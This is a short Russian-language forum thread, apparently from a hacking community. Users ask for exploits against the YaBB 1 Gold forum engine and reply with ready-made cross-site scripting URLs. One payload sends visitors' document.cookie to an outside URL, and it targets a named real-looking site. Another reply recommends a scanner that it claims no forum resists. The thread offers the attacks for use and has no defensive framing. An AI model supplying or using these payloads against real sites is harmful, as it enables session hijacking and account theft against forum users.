Народ,хотелось бы узнать какие последние уязвимости этого форума есть и сплойты к нему? А то по phpBB куча всякой инфы,а по YaBB 1 Gold я нашел мало,да и то какое то старье. Может,кто что новое подскажет?
Да, там можно межсайтовый скриптинг произвести, вот пример: Code: http://host/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert()</script> Code: http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display; num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d' %2b(document.cookie)%3b</Script> P.S. прошу прощения за флуд.
на секьюре лежала, там и надыбал, ведь он же не сообщил какой сайт именно, попросили уязвимости,Ю я и сообщил.
http://forum.antichat.ru/thread11807.html Возьми от сюда мануальный сканер, и проскань этот форум. Ни один форум еще от этого сканера не был защищен.
